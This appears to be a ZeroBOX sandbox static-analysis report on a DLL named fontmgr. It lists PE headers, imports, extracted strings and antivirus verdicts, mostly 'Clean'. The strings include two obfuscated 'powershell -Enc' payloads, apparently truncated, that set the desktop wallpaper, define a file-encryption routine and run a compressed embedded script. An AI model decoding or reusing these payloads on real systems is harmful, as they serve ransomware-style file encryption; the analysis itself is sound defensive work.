popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2021-09-06 20:43:32

PDB Path

D:\PCC2021\ioc\word_malware\fontmgr\Release\fontmgr.pdb

PE Imphash

32b1df407523bd5c4bab9e39f39c7353

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00000e8d 0x00001000 5.95942419168
.rdata 0x00002000 0x000065da 0x00006600 4.39292872523
.data 0x00009000 0x00000398 0x00000200 0.265466870762
.rsrc 0x0000a000 0x000000f8 0x00000200 2.51196201565
.reloc 0x0000b000 0x0000015c 0x00000200 4.80246590103

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x0000a060 0x00000091 LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x10002000 WinExec
0x10002004 IsDebuggerPresent
0x10002008 InitializeSListHead
0x10002010 GetCurrentThreadId
0x10002014 GetCurrentProcessId
0x10002020 TerminateProcess
0x10002024 GetCurrentProcess
Library VCRUNTIME140.dll:
0x10002034 memset
Library api-ms-win-crt-runtime-l1-1-0.dll:
0x10002044 _cexit
0x10002048 _seh_filter_dll
0x1000204c _initterm_e
0x10002050 _initterm
0x1000205c _execute_onexit_table
0x10002060 _configure_narrow_argv
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
powershell -Enc ZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGEAbABsAFAAYQBwAGUAcgAgAHsAIAAgACAADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAewBUAHIAYABVAEUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIAAjACAAUAByAG8AdgBpAGQAZQAgAHAAYQB0AGgAIAB0AG8AIABpAG0AYQBnAGUADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AEkAYABNAGAAQQBnAEUAfQAsAA0ACgAgACAAIAAgACAAIAAgACAAIwAgAFAAcgBvAHYAaQBkAGUAIAB3AGEAbABsAHAAYQBwAGUAcgAgAHMAdAB5AGwAZQAgAHQAaABhAHQAIAB5AG8AdQAgAHcAbwB1AGwAZAAgAGwAaQBrAGUAIABhAHAAcABsAGkAZQBkAA0ACgAgACAAIAAgACAAIAAgACAAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB7AEYAYABBAGAAbABTAGUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAFYAYQBsAGkAZABhAHQAZQBTAGUAdAAoACgAJwBGACcAKwAnAGkAbABsACcAKQAsAC
AAKAAnAEYAJwArACcAaQB0ACcAKQAsACAAKAAnAFMAJwArACcAdAByAGUAJwArACcAdABjAGgAJwApACwAIAAoACcAVABpACcAKwAnAGwAZQAnACkALAAgACgAJwBDAGUAbgB0AGUAJwArACcAcgAnACkALAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AFMAYABUAHkAbABlAH0ADQAKACAAIAAgACAAKQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACQAewBXAGAAQQBgAEwATABwAGEAUABFAHIAYABzAFQAWQBMAGUAfQAgAD0AIABTAHcAaQB0AGMAaAAgACgAJAB7AHMAVAB5AGAAbABlAH0AKQAgAHsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEYAaQBsACcAKwAnAGwAJwApACAAewAnADEAMAAnAH0ADQAKACAAIAAgACAAIAAgACAAIAAoACcARgBpACcAKwAnAHQAJwApACAAewAiADYAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFMAdAByAGUAdAAnACsAJwBjAGgAJwApACAAewAiADIAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFQAaQAnACsAJwBsAGUAJwApACAAewAiADAAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKA
AnAEMAJwArACcAZQBuAHQAZQByACcAKQAgAHsAIgAwACIAfQANAAoAIAAgACAAIAAgACAAIAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQAgAHsAJwAyADIAJwB9AA0ACgAgACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAASQBmACgAJAB7AHMAVABgAFkAbABFAH0AIAAtAGUAcQAgACgAJwBUAGkAJwArACcAbABlACcAKQApACAAewANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAbgBFAGAAdwAtAGAAaQBUAGUAbQBgAHAAUgBPAFAAZQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwBDAFUAOgBrAHkANQBDACcAKwAnAG8AbgB0AHIAJwArACcAbwBsACcAKwAnACAAUAAnACsAJwBhAG4AZQBsAGsAJwArACcAeQA1AEQAZQBzAGsAdABvACcAKwAnAHAAJwApACAAIAAtAFIAZQBwAGwAQQBjAEUAJwBrAHkANQAnACwAWwBjAGgAYQByAF0AOQAyACkAIAAtAE4AYQBtAGUAIABXAGEAbABsAHAAYQBwAGUAcgBTAHQAeQBsAGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACQAewBXAGEAbABgAGwAcABBAFAAZQByAHMAVAB5AG
AATABlAH0AIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAE4ARQBgAHcALQBJAFQARQBtAHAAUgBgAG8AYABQAGAARQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwAnACsAJwBDAFUAOgBsAGgAJwArACcAeABDAG8AbgB0AHIAbwBsACcAKwAnACAAJwArACcAUABhAG4AZQBsAGwAaAB4AEQAZQBzAGsAdABvAHAAJwApAC4AcgBFAHAAbABhAEMAZQAoACgAWwBjAEgAQQBSAF0AMQAwADgAKwBbAGMASABBAFIAXQAxADAANAArAFsAYwBIAEEAUgBdADEAMgAwACkALAAnAFwAJwApACkAIAAtAE4AYQBtAGUAIABUAGkAbABlAFcAYQBsAGwAcABhAHAAZQByACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAEUAbABzAGUAIAB7AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABOAGAAZQBXAC0AaQBUAEUATQBwAGAAUgBPAGAAcABFAHIAYABUAHkAIAAtAFAAYQB0AGgAIAAoACgAJwBIAEsAQwBVADoAJwArACcAagBUAGYAQwBvAG4AJwArACcAdAAnACsAJw
ByAG8AbAAgAFAAJwArACcAYQBuACcAKwAnAGUAJwArACcAbABqAFQAZgAnACsAJwBEAGUAcwBrAHQAbwBwACcAKQAtAFIARQBwAEwAYQBDAEUAKABbAGMASABhAFIAXQAxADAANgArAFsAYwBIAGEAUgBdADgANAArAFsAYwBIAGEAUgBdADEAMAAyACkALABbAGMASABhAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFcAYQBsAGwAcABhAHAAZQByAFMAdAB5AGwAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAJAB7AHcAYQBsAEwAUABhAGAAcABFAFIAUwB0AGAAeQBgAGwAZQB9ACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIABuAGAAZQBXAC0AaQBUAGUAbQBgAHAAcgBgAE8AcABFAFIAdABZACAALQBQAGEAdABoACAAKAAoACcASABLAEMAJwArACcAVQA6ADYAVwBVAEMAbwBuAHQAcgBvAGwAIABQAGEAbgBlAGwANgAnACsAJwBXAFUARAAnACsAJwBlACcAKwAnAHMAawAnACsAJwB0AG8AcAAnACkAIAAtAEMAcgBFAHAAbABBAEMAZQAnADYAVwBVACcALABbAGMASABBAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFQAaQBsAGUAVwBhAGwAbABwAGEAcABlAHIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAB7AFQAYABlAE0AUAB9ACAAPQANAAoAQAAiACAADQAKACAAIAAgACAAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAgAA0ACg
B1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AIAAoAEkAbgB0ADMAMgAgAHUAQQBjAHQAaQBvAG4ALAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB0ADMAMgAgAHUAUABhAHIAYQBtACwAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAcgBpAG4AZwAgAGwAcAB2AFAAYQByAGEAbQAsACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAMwAyACAAZgB1AFcAaQBuAEkAbgBpACkAOwANAAoAIAAgACAAIAB9AA0ACgAiAEAAIAANAAoAIAAgACAAIABBAGAARABkAGAALQB0AFkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHsAdABgAEUAbQBQAH0ADQAKAA0ACgAgACAAIAAgACQAewBzAHAAaQBfAHMAYABlAGAAVABkAGAARQBzAEsAVwBhAGAAbABsAFAAYQBQAEUAUgB9ACAAPQAgADAAeAAwADAAMQA0AA0ACgAgACAAIAAgACQAew
A9ACAAWwBQAGEAcgBhAG0AcwBdADoAOgBTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AKAAkAHsAcwBwAGAAaQBfAHMAZQBgAFQAYABkAGAAZQBTAGsAdwBhAEwATABgAHAAYQBwAGAARQByAH0ALAAgADAALAAgACQAewBpAG0AQQBgAGcAZQB9ACwAIAAkAHsARgBXAGAAaQBgAE4AaQBOAGkAfQApAA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgB2AG8AawBlAC0ARQBuAGMAcgB5AGMAcgB5ACAAewANAAoAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ADQAKACAAIAAgACAAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBzAHQAcgBpAG4AZwBdACkAXQANAAoAIAAgACAAIABQAGEAcgBhAG0ADQAKACAAIAAgACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAHsAdABSAGAAVQBFAH0AKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBrAGAARQB5AH0ALAANAAoADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJAB7AFQAUgBgAFUARQB9ACwAIABQAGEAcgBhAG0AZQB0AGUAcgBTAGUAdABOAGEAbQBlACAAPQAgACIAYwBSAFkAcABgAFQAZgBJAGAATABlACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBQAGAAQQBUAEgAfQANAAoAIAAgACAAIAApADsADQAKAA0ACgAgACAAIA
powershell -Enc KABuAGUAVwAtAG8AQgBKAGUAQwBUACAAaQBPAC4AYwBPAG0AUABSAEUAUwBzAGkATwBuAC4ARABlAGYATABhAFQARQBzAHQAcgBlAGEAbQAoAFsAaQBPAC4ATQBFAE0ATwByAFkAUwBUAHIARQBhAE0AXQBbAHMAWQBTAHQAZQBtAC4AQwBvAG4AdgBFAFIAVABdADoAOgBGAHIAbwBtAEIAYQBzAEUANgA0AHMAdABSAGkAbgBnACgAJwByAFYAVgBSAGIAOQBvADYARgBIADUASAA0AGoAOQBZAEMAQQBtAGkAawBaAFIAYgBXAEsAZABMAFYAVwBtAFUAcgBoAHUANgBhADEAYwBKAGQAdgBmAEEAKwBtAEMAYwBBAC8ASABGADIASgBuAHQAbABIAEsAMwAvAHYAYwBkAHgAdwBtAEYAagBqAHgATQBtAGwAOABTAE8ALwBiADMAZgBlAGUAYwA3AHoAaABOAFMAeQA1AEkAYQAzAFkAbAB4AEgAaQBkAEsAbQAzAGIAagBjAHkAQQA3AHAAMQBHAHMAUgBDAE4ANABKADYAawAyAFYAeAB3AFIAbwB5AGwARgBoAC8AdwBhAEUARgBMAE0AbABkAEsAawBFAG0AaQBOAGwAKwA0AGoATgBXAG0AegBhAFUAbABDAFoAVwB4AGcAQQA1AHgANwAyADQAMwBCAE8AZQB0AGUAbwAzAEcAYwBXAGkAMwBLAFoAQgBRADAAagBXAFEARABaAGMAawBYAE0ATgA2AEQAcABvADAAcgBWADgAMABLAFcAVgBBAEoATwBJAC8AUQBMADAAMgA4AHkAOABSADcAcgB3AGYARABQAFkANAAyAHIAUABKADEAbABoAFkAUgAxAGUAYwBMAHEAVQB5AEsATQBkAEUAZAAxAG8AeABNAEEAWgAzAHYAZwBjADcAeQByAFEARwBhAFkAdQAxAGQAawBCACsARQBGAHcATgBpADMAawBRADMAVgBBAHUA
RSDSbzm
D:\PCC2021\ioc\word_malware\fontmgr\Release\fontmgr.pdb
.text$mn
.idata$5
.00cfg
.CRT$XCA
.CRT$XCZ
.CRT$XIA
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
WinExec
KERNEL32.dll
__std_type_info_destroy_list
memset
_except_handler4_common
VCRUNTIME140.dll
_initterm
_initterm_e
_seh_filter_dll
_configure_narrow_argv
_initialize_narrow_environment
_initialize_onexit_table
_execute_onexit_table
_cexit
api-ms-win-crt-runtime-l1-1-0.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
</assembly>
0%0^0~0
2*2/2H2M2Z2
45%5+51575=5D5K5R5Y5`5g5n5v5~5
6!6*676M6
7!8T8z8
<-=6=?=M=V=x=
T?X?`?
Antivirus Signature
Bkav W32.AIDetect.malware2
Lionic Clean
Elastic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
CrowdStrike Clean
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall Clean
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Rising Clean
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
SentinelOne Clean
FireEye Clean
Sophos Clean
APEX Clean
Jiangmin Clean
Webroot Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
TACHYON Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Cylance Clean
Panda Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
eGambit Clean
Fortinet Clean
Avast Clean
MaxSecure Clean
No IRMA results available.